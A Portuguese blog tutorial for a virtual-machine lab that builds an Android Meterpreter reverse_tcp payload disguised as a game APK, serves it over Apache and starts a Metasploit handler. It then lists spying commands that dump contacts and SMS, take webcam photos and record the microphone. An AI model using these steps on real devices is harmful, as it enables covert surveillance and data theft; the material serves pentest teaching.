Foto de perfil

Criando Payload no Kali Linux para Hackear Android

Com o avanço  da tecnologia da informação e implementação de políticas de BYOD, existe um grande aumento do uso de smartphone na sociedade. E os hackers estão tentando obter informações sensíveis relacionadas com empresas ou seus empregados.

Um analista de segurança ou  Pentester, deve familiarizar-se com todos os exploits e payloads disponíveis no Kali Linux para realizar vários testes de vulnerabilidades nos dispositivos conectados a rede.

Objetivo

O objetivo desse artigo é ajudar a compreender a importância de não se instalar programas de fontes desconhecidas, bem como expor a possibilidade de exploração de dispositivos móveis.

Será criado um servidor e vamos testar um dispositivo conectado na rede, que são propensos a ataques. Realizar o ataque usando um simples apk (Android Package).

Cenário

Iremos utilizar uma máquina virtual com o Kali Linux e outra com o Android. Estou utilizando o VMware e as placas de rede como NAT. Nesse exemplo o IP do Kali é 192.168.173.238.

Kali Linux

O kali que será usado é 2016.2. Iremos agora:

  1. Criar o payload usando o msfvenom;
  2. Iniciar e acessar o metasploit;
  3. Criar um handler para aguardar a conexão reversa;

 

1. Criar o payload usando o msfvenom

O msfvenom  é a combinação do Msfpayload e Msfencode, colocados juntos nessa ferramenta em um único framework. O msfvenom substituiu tanto o msfpayload quanto o msfenconde desde 08 de junho de 2015.  As vantagens são:

  • Um única ferramenta;
  • As opções de linha de comando foram padronizadas;
  • Aumento na velocidade de execução.

Possui um grande número de opções:

captura-de-tela-2016-11-19-as-2-31-48-pm

 

Ok Agora vamos criar o malware, o  apk – aplicação android , que irá ser disponibilizada para o dispositivo android.

Digite o seguinte comando:

captura-de-tela-2016-11-19-as-2-40-17-pm

 

Iremos disponibilizar essa aplicação maliciosa via um servidor web. Precisamos copiar o apk para o diretório do servidor web apache. Vamos também alterar o nome do arquivo index.html para index.txt para o apache listar os arquivos na página principal e finalmente reiniciar o apache.

# cp street fighter.apk  /var/www/html

# cd /var/www/html/

# mv index.html  index.txt

# service apache2 restart

Iniciar e acessar o metasploit

Iniciar o postgresql

# service postgresql start

Acessar o metasploit, digite msfconsole e aperte Enter.

 

 

captura-de-tela-2016-11-19-as-3-00-24-pm

 

Quando você digita use exploit/multi/handler e aperta Enter você diz para tratar exploits lançados de fora do framework.

Agora digite os seguintes comandos no msfconsole:

  • Digite set payload android/meterpreter/reverse_tcp e aperte Enter.
  • Digite set LHOST 192.168.173.238 e aperte Enter.
  • Digite show options e aperte Enter. Este comando  irá exibir qual a porta será aberta.

captura-de-tela-2016-11-19-as-3-12-33-pm

 

Digite exploit -j -z e aperte Enter. Irá rodar o exploit em background.

captura-de-tela-2016-11-19-as-3-18-59-pm

 

Usando o Android

Você pode fazer o download da ISO em http://www.android-x86.org/download. A instalação é bem tranquila. Após a instalação ter sido feita ligar a VM e acessá-la. Abaixo segue tela inicial do Android Versão 4.3.

 

captura-de-tela-2016-11-19-as-4-21-31-pm

 

Clique no Menu e acesse o Browser. Vamos baixar uma imagem qualquer.

 

captura-de-tela-2016-11-19-as-4-25-24-pm

 

O próximo passo é baixar o apk malicioso disponível na máquina do Kali.

na url do browser digite: http://192.168.173.238

Baixe o apk. Ele irá para Downloads. Clique no menu principal vá até Downloads e clique no apk. Ele irá informar que você deve permitir a instalação de programas de fontes desconhecidas. Aceite e tente instalar novamente. Clique em abrir a aplicação. No kali você verá a conexão reversa sendo executada.

 

captura-de-tela-2016-11-19-as-4-35-13-pm

 

Digite sessions -l para listar as sessões abertas. Ele exibiu uma sessão com ID igual a 1 aberta.

captura-de-tela-2016-11-19-as-4-37-52-pm

 

Acessar essa sessão, digitando sessions -i 1. O -i é de interact, ou seja, interagir.

Pronto! Você está acessando o controlando o seu Android. Agora vamos brincar.

Digite ipconfig e verá informações de endereçamento.

Inserindo o comando sysinfo, irá exibir informações da máquina alvo, como o nome, sistema operacional e etc.

captura-de-tela-2016-11-19-as-6-00-11-pm

Como no Linux, digitando pwd irá exibir o diretório atual que você no sistema.

O diretório principal do Android é o /sdcard. Para mudar basta usar o comando cd.

meterpreter> cd /sdcard

meterpreter> pwd

Ele exibe que o diretório corrente é o /storage/emulated/legacy porque está emulando um armazenamento interno de um dispositivo móvel mesmo.

Pode-se criar agora um diretório chamado base, depois dê um ls:

captura-de-tela-2016-11-19-as-7-10-23-pm

 

A idéia é fazer um upload de um arquivo do Kali para o diretório base. Para fazer isso precisamos mudar para o diretório /sdcard/base. Outro detalhe importante é que ele só permite fazer upload de arquivos que estejam no diretório root do Kali.

Vou copiar o apk que está dentro de /var/www/html para o /root.

captura-de-tela-2016-11-19-as-7-36-38-pm

Agora fazer o upload do arquivo.

captura-de-tela-2016-11-19-as-7-31-59-pm

 

Para ver todos os arquivos localizados  no diretório Download, é necessário alterar para o diretório com o comando cd /sdcard/Download. Em seguida digitar ls para ver os arquivos lá dentro.

captura-de-tela-2016-11-19-as-7-44-17-pm

 

Bem podemos ver que tem alguns arquivos dentro do diretório. Para baixar basta digitar o comando download e o nome do arquivo completo.

 

captura-de-tela-2016-11-19-as-7-47-52-pm

 

Agora vá no Kali no diretório home folder par ver a imagem baixada.

 

captura-de-tela-2016-11-19-as-7-50-23-pm

 

 

captura-de-tela-2016-11-19-as-7-52-58-pm

 

Digite o comando help e verá as muitas opções desse exploit. Explore os comandos abaixo:

meterpreter> search -f *.mp3

meterpreter> dump_contacts

meterpreter> dump_sms

meterpreter> webcam_list

meterpreter> webcam_snap

meterpreter> webcam_snap -l 1

meterpreter> record_mic 5

meterpreter> webcam_stream -I 2

 

No próximo artigo vamos coletar credenciais usando uma ferramenta de engenharia social.

 

Até a próxima e que a força esteja com você.

 

 

19 de novembro de 2016

No comments, be the first one to comment !

Deixe uma resposta

Todos os direitos reservados.

Login

REGISTRO

Crie uma conta
Criar uma conta Voltar ao login/registro